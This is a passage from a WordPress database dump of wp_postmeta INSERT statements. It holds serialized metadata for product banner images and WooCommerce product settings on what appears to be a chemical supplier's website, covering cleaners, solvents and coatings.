;s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13887, 1232, '_edit_lock', '1472844606:2'); 
INSERT INTO `wp_postmeta` VALUES (13888, 1232, '_wp_attachment_backup_sizes', 'a:14:{s:9:"full-orig";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:22:"conformal-coatings.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:29:"conformal-coatings-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:29:"conformal-coatings-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:29:"conformal-coatings-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:29:"conformal-coatings-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:29:"conformal-coatings-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:29:"conformal-coatings-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:18:"full-1472844578345";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:37:"conformal-coatings-e1472844508138.jpg";}s:23:"thumbnail-1472844578345";a:4:{s:4:"file";s:44:"conformal-coatings-e1472844508138-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:20:"medium-1472844578345";a:4:{s:4:"file";s:44:"conformal-coatings-e1472844508138-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:26:"medium_large-1472844578345";a:4:{s:4:"file";s:44:"conformal-coatings-e1472844508138-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:28:"shop_thumbnail-1472844578345";a:4:{s:4:"file";s:44:"conformal-coatings-e1472844508138-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:26:"shop_catalog-1472844578345";a:4:{s:4:"file";s:44:"conformal-coatings-e1472844508138-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:25:"shop_single-1472844578345";a:4:{s:4:"file";s:44:"conformal-coatings-e1472844508138-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13889, 1230, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13890, 1230, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13891, 1230, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13892, 1230, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13893, 1230, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13894, 1230, '318_custom_list_file', 'a:2:{s:32:"96a01a2575df5f3308aa0f4dbad0db49";a:3:{s:4:"name";s:9:"HELOXY 71";s:4:"file";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/heloxy-71.pdf";s:4:"desc";s:13:"HELOXY 71 TDS";}s:32:"f37e7788ae15521b493ecd57ee713aae";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/heloxy-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13895, 1230, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13896, 1230, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13897, 1230, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13898, 1230, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13899, 1230, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13900, 1230, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13901, 1230, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13902, 1230, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13903, 1230, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13904, 1230, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13905, 1230, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13906, 1230, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13907, 1230, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13908, 1230, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13909, 1230, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13910, 1230, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13911, 1230, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13912, 1230, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13913, 1230, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13914, 1230, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13915, 1230, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13916, 1230, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13917, 1230, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13918, 1230, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13919, 1230, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13920, 1230, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13921, 1230, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13922, 1230, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13923, 1230, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13924, 1230, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13925, 1232, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13926, 1221, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (13927, 955, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (13928, 1102, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (13939, 1237, '_wp_attached_file', '2016/09/contact-cleaners-e1473174090160.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13940, 1237, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:43:"2016/09/contact-cleaners-e1473174090160.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:42:"contact-cleaners-e1473174090160-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:42:"contact-cleaners-e1473174090160-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:42:"contact-cleaners-e1473174090160-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:42:"contact-cleaners-e1473174090160-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:42:"contact-cleaners-e1473174090160-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:42:"contact-cleaners-e1473174090160-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:42:"contact-cleaners-e1473174090160-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13941, 1237, '_edit_lock', '1473173952:2'); 
INSERT INTO `wp_postmeta` VALUES (13942, 1237, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:20:"contact-cleaners.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:27:"contact-cleaners-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:27:"contact-cleaners-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:27:"contact-cleaners-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:27:"contact-cleaners-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:27:"contact-cleaners-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:27:"contact-cleaners-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13943, 1237, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13944, 1238, '_wp_attached_file', '2016/09/specialty-solvents-e1473174201327.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13945, 1238, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:45:"2016/09/specialty-solvents-e1473174201327.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:44:"specialty-solvents-e1473174201327-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:44:"specialty-solvents-e1473174201327-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:44:"specialty-solvents-e1473174201327-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:44:"specialty-solvents-e1473174201327-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:44:"specialty-solvents-e1473174201327-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:44:"specialty-solvents-e1473174201327-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:44:"specialty-solvents-e1473174201327-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13946, 1238, '_edit_lock', '1473174079:2'); 
INSERT INTO `wp_postmeta` VALUES (13947, 1238, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:22:"specialty-solvents.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:29:"specialty-solvents-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:29:"specialty-solvents-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:29:"specialty-solvents-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:29:"specialty-solvents-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:29:"specialty-solvents-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:29:"specialty-solvents-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13948, 1238, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13949, 1239, '_wp_attached_file', '2016/09/flux-removers-e1473174325248.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13950, 1239, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:40:"2016/09/flux-removers-e1473174325248.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"flux-removers-e1473174325248-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"flux-removers-e1473174325248-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"flux-removers-e1473174325248-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"flux-removers-e1473174325248-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"flux-removers-e1473174325248-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"flux-removers-e1473174325248-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"flux-removers-e1473174325248-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13951, 1239, '_edit_lock', '1473174189:2'); 
INSERT INTO `wp_postmeta` VALUES (13952, 1239, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:17:"flux-removers.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:24:"flux-removers-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:24:"flux-removers-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:24:"flux-removers-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:24:"flux-removers-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:24:"flux-removers-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:24:"flux-removers-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13953, 1239, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13954, 1240, '_wp_attached_file', '2016/09/media-head-cleaners-e1473174418434.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13955, 1240, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:46:"2016/09/media-head-cleaners-e1473174418434.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:45:"media-head-cleaners-e1473174418434-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:45:"media-head-cleaners-e1473174418434-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:45:"media-head-cleaners-e1473174418434-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:45:"media-head-cleaners-e1473174418434-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:45:"media-head-cleaners-e1473174418434-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:45:"media-head-cleaners-e1473174418434-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:45:"media-head-cleaners-e1473174418434-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13956, 1240, '_edit_lock', '1473174299:2'); 
INSERT INTO `wp_postmeta` VALUES (13957, 1240, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:23:"media-head-cleaners.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:30:"media-head-cleaners-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:30:"media-head-cleaners-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:30:"media-head-cleaners-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:30:"media-head-cleaners-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:30:"media-head-cleaners-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:30:"media-head-cleaners-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13958, 1240, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13959, 1241, '_wp_attached_file', '2016/09/plastic-metal-glass-cleaner-e1473174555929.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13960, 1241, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:54:"2016/09/plastic-metal-glass-cleaner-e1473174555929.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:53:"plastic-metal-glass-cleaner-e1473174555929-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:53:"plastic-metal-glass-cleaner-e1473174555929-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:53:"plastic-metal-glass-cleaner-e1473174555929-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:53:"plastic-metal-glass-cleaner-e1473174555929-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:53:"plastic-metal-glass-cleaner-e1473174555929-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:53:"plastic-metal-glass-cleaner-e1473174555929-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:53:"plastic-metal-glass-cleaner-e1473174555929-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13961, 1241, '_edit_lock', '1473174427:2'); 
INSERT INTO `wp_postmeta` VALUES (13962, 1241, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:31:"plastic-metal-glass-cleaner.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:38:"plastic-metal-glass-cleaner-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:38:"plastic-metal-glass-cleaner-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:38:"plastic-metal-glass-cleaner-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:38:"plastic-metal-glass-cleaner-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:38:"plastic-metal-glass-cleaner-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:38:"plastic-metal-glass-cleaner-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13963, 1241, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13964, 1242, '_wp_attached_file', '2016/09/solvent-cleaners-e1473174661392.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13965, 1242, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:43:"2016/09/solvent-cleaners-e1473174661392.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:42:"solvent-cleaners-e1473174661392-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:42:"solvent-cleaners-e1473174661392-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:42:"solvent-cleaners-e1473174661392-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:42:"solvent-cleaners-e1473174661392-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:42:"solvent-cleaners-e1473174661392-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:42:"solvent-cleaners-e1473174661392-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:42:"solvent-cleaners-e1473174661392-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13966, 1242, '_edit_lock', '1473175889:2'); 
INSERT INTO `wp_postmeta` VALUES (13967, 1242, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:20:"solvent-cleaners.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:27:"solvent-cleaners-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:27:"solvent-cleaners-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:27:"solvent-cleaners-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:27:"solvent-cleaners-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:27:"solvent-cleaners-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:27:"solvent-cleaners-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}'); 
